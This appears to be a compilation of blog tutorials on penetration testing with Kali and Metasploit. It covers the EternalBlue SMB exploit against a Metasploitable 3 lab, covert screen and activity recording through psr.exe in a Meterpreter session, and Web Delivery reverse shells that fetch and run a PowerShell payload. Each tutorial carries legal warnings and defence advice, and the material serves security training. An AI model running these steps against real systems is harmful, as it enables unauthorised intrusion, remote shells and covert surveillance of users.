Using the “NSA” EternalBlue exploit on Metasploitable 3

In this tutorial, we will see how to use the “EternalBlue” MS17-010 SMB exploit in Metasploit on Kali Linux to obtain a remote shell in Metasploitable 3, which uses Windows Server 2008.

Introduction

EternalBlue is one of several tools that were allegedly created and used by the NSA. The tools were publicly dumped by a hacker group called “Shadow Brokers” in April. The exploit has been modified and adapted to work as a Metasploit module and has been added to the latest Metasploit version. EternalBlue is a good exploit for Ethical Hackers to try in a test environment as it works very well and returns a System level shell when successful.

Preface

I had to manually update the Metasploit in Kali, as of the time of this writing the EternalBlue exploit was not available in the latest Kali update. Also, there seems to be some issues with the latest Metasploitable 3 install, as several of the service ports that should be open were blocked and it seems some services were not available.

As always, never attempt to access or test a system that you do not have express permission to do so, doing so is illegal and you could end up in jail.

Tutorial

Enough introduction, let’s see the exploit in action!

  • Start the Metasploit framework.
  • In Metasploit, enter “search eternalblue

  • Type, “use exploit/windows/smb/ms17_010_eternalblue

Now you can enter “show options” to see what options are available:

There is not really much you need to do. Just set the target IP (RHOST), and select a payload:

  • set RHOST 192.168.1.127
  • set payload windows/x64/meterpreter/reverse_tcp

You can type “show options” again to see what options need to be set for the payload, but all we need is the Kali IP address (LHOST):

  • set LHOST 192.168.1.3
  • Finally, type “exploit

And we have a shell!

You can type “help” top see all the available Meterpreter commands or just type “shell” for a remote command shell:

And that is it!

Defense

The best mitigation against this attack is to make sure all of your Windows systems are patched and up to date. This exploit has been patched for a while now. It is also a good idea to disable SMB v1, but you must realize the impact that this could have on your network before doing so, and decide if this would be a viable solution for your company.

If you liked this tutorial and want to learn a lot more about Kali, Metasploit and Ethical Hacking, check out my “Basic Security Testing with Kali Linux 2” book.

Advertisements

Security Book Give Away: Intermediate Security Testing with Kali Linux 2

UPDATE 4/3 – The Contest is now over, and winners have been notified. Thank you everyone for your interest and support!

Want a chance to win a signed copy of “Intermediate Security Testing with Kali Linux 2”?

This almost 500 page hands-on, step-by-step tutorial style book doesn’t dwell on the theory of security, but instead walks you through implementing and using the latest security tools and techniques using the most popular computer security testing platform, Kali Linux:

Book Cover proof

My third book, “Basic Security Testing with Kali Linux 2” a total update of my hugely popular “Basic Security Testing” book, has just been published! To celebrate I am giving away four signed copies of my second book, “Intermediate Security Testing with Kali Linux 2”.

Simply share a link to this article on your favorite social media site. Then place a copy of the link in the comments field below. Winners will be chosen at random in two weeks (April 1st) from links in the comments section.

Using Problem Steps Recorder (PSR) Remotely with Metasploit

Windows includes a built in program that captures screenshots and text descriptions of what a user is doing on their system. This program could be accessed remotely by a hacker. In this article we will see how to run the program from a remote shell using Metasploit.

Introduction

Windows includes a great support program that you have probably never heard of called “Problem Steps Recorder” (psr.exe). Microsoft made this program to help troubleshooters see step-by-step what a user is doing. If a user is having a computer problem that they either can’t articulate well or tech support just can’t visualize the issue, all the support personnel needs to do is have the user run psr.exe.

When PSR runs it automatically begins capturing screen captures of everything that the user clicks on, it also keeps a running dialog of what the user is doing in a text log. When done, the data is saved into an HTML format and zipped so all the user needs to do is e-mail this to the tech support department.

I have honestly never heard of PSR before yesterday when Mark Burnett (@m8urnett) mentioned it on Twitter:

PSR Metasploit 1

Creepy indeed, but I thought that if you could run it remotely, it would be a great tool for a penetration tester. Well, you can! Though running PSR as an attack tool isn’t a new idea. I did some searching and it is mentioned multiple times over the last several years in this manner. Pipefish even mentions using it with Metasploit back in this 2012 article (http://pipefish.me/tag/psr-exe/).

To use Steps Recorder normally, all you need to do is click the start button in Windows and type “psr” into the search box. Then click on “Steps Recorder”.

A small user interface opens up:

PSR Metasploit 2

Just click “Start Record” to start. It then immediately begins grabbing screenshots. It displays a red globe around the pointer whenever a screenshot is taken. Then press “Stop Recording” when done. You will then be presented with a very impressive looking report of everything that you did. You then have the option of saving the report.

PSR can be run from the command prompt. Below is a listing of command switches from Microsoft :

psr.exe [/start |/stop][/output <fullfilepath>] [/sc (0|1)] [/maxsc <value>]
[/sketch (0|1)] [/slides (0|1)] [/gui (0|1)]
[/arcetl (0|1)] [/arcxml (0|1)] [/arcmht (0|1)]
[/stopevent <eventname>] [/maxlogsize <value>] [/recordpid <pid>]

/start Start Recording. (Outputpath flag SHOULD be specified)
/stop Stop Recording.
/sc Capture screenshots for recorded steps.
/maxsc Maximum number of recent screen captures.
/maxlogsize Maximum log file size (in MB) before wrapping occurs.
/gui Display control GUI.
/arcetl Include raw ETW file in archive output.
/arcxml Include MHT file in archive output.
/recordpid Record all actions associated with given PID.
/sketch Sketch UI if no screenshot was saved.
/slides Create slide show HTML pages.
/output Store output of record session in given path.
/stopevent Event to signal after output files are generated.

Using PSR remotely with Metasploit

Using the command line options, PSR works very nicely with Metasploit in a penetration testing scenario. I will start with an active remote Meterpreter session between a test Windows 7 system and Kali Linux. There are many ways that you could do this, but I simply made a short text file as seen below:

  • psr.exe /start /gui 0 /output C:\Users\Dan\Desktop\cool.zip;
  • Start-Sleep -s 20;
  • psr.exe /stop;

The commands above start PSR, turns off that pesky Gui window that pops up when running and turns off the red pointer glow when recording pages. It then saves the file to the desktop.

The script waits 20 seconds and then stops recording.

I then encoded the command and ran it in a command shell:

PSR Metasploit 3
After 20 seconds a new “cool.zip” file popped up on the Windows 7 desktop:

PSR Metasploit 4
This file contained a complete step by step list of everything the user did during the 20 second window. At the top of the file are the screenshots:

PSR Metasploit 5
And at the bottom was the step by step text log:

PSR Metasploit 6
I actually like using PSR now better than Metasploit’s built in screenshot capability, especially with the blow by blow text log that is included. The script also worked well against Windows 10 with some minor tweaks.

Defending against this attack

Problem Steps Recorder can be disabled in group policy. Though I did not see anywhere on how to completely uninstall PSR.

The best defense is to block the remote connection from being created, so standard security practices apply. Keep your operating systems and AV up to date. Don’t open unsolicited, unexpected or questionable e-mail attachments. Avoid questionable links, be leery of shortened URLs and always surf safely.

If you want to learn more about computer security testing using Metasploit and Kali Linux, check out my latest book, “Intermediate Computer Security Testing with Kali Linux 2”.

Easy Remote Shells with Web Delivery

This is a sneak peak at a section of the “Web Delivery” chapter in my new Ethical Hacking book, “Intermediate Security Testing with Kali Linux 2“. The Metasploit Web Delivery module is one of the easiest ways to quickly get a remote shell from a Linux, Mac or Windows system. In the full chapter I show how to use it against all three platforms. For the preview we will only cover Windows based targets.

As always, never try to access a network or system that you do not have express written permission to do so. Accessing systems that you don’t have permission to is illegal and you could end up in jail.

Web Delivery

In this section we will learn how to  using the Web Delivery exploit module. We will be using Metasploit and our Windows 7 VM as the target.

Let’s get started!

1. From a Kali terminal, type “msfconsole”:

Metasploit Web Delivery 1
2. Now enter:

  •  use exploit/multi/script/web_delivery
  •  set lhost [Kali IP Address]
  •  set lport 4444

3. Type, “show targets”:

Metasploit Web Delivery 2

Notice we have 3 options, Python, PHP and PSH (PowerShell). We will be attacking a Windows system, so we will use PowerShell.

4. Enter, “set target 2”
5. Set the payload, “set payload windows/meterpreter/reverse_tcp”
6. You can check that everything looks okay with “show options”:

Metasploit Web Delivery 3
7. Now type, “exploit”:

Metasploit Web Delivery 4

This starts a listener server that hosts our payload and then waits for an incoming connection. All we need to do is run the generated PowerShell command on our target system.

8. On the Windows 7 system, open a command prompt and paste in and execute the PowerShell command:

Metasploit Web Delivery 5
And after a few seconds you should see:

Metasploit Web Delivery 6

A meterpreter session open!

9. Now type, “sessions” to list the active sessions
10. Connect to it with “sessions -i 1”

Metasploit Web Delivery 7

We now have a full Meterpreter shell to the target:

Metasploit Web Delivery 8
Type “exit” to quit the active session and “exit” again to exit Metasploit.

I hope you enjoyed this chapter section preview. In the full chapter, I show how Web Delivery can be set to work against Linux and Mac systems also. In addition in the Msfvenom chapter you will also see how to make standalone executable shells that don’t require the target to open a command prompt on their system and manually run the code.

For a lot more ethical hacking training and hands on tutorials, check out “Intermediate Security Testing with Kali Linux 2” available on Amazon.com.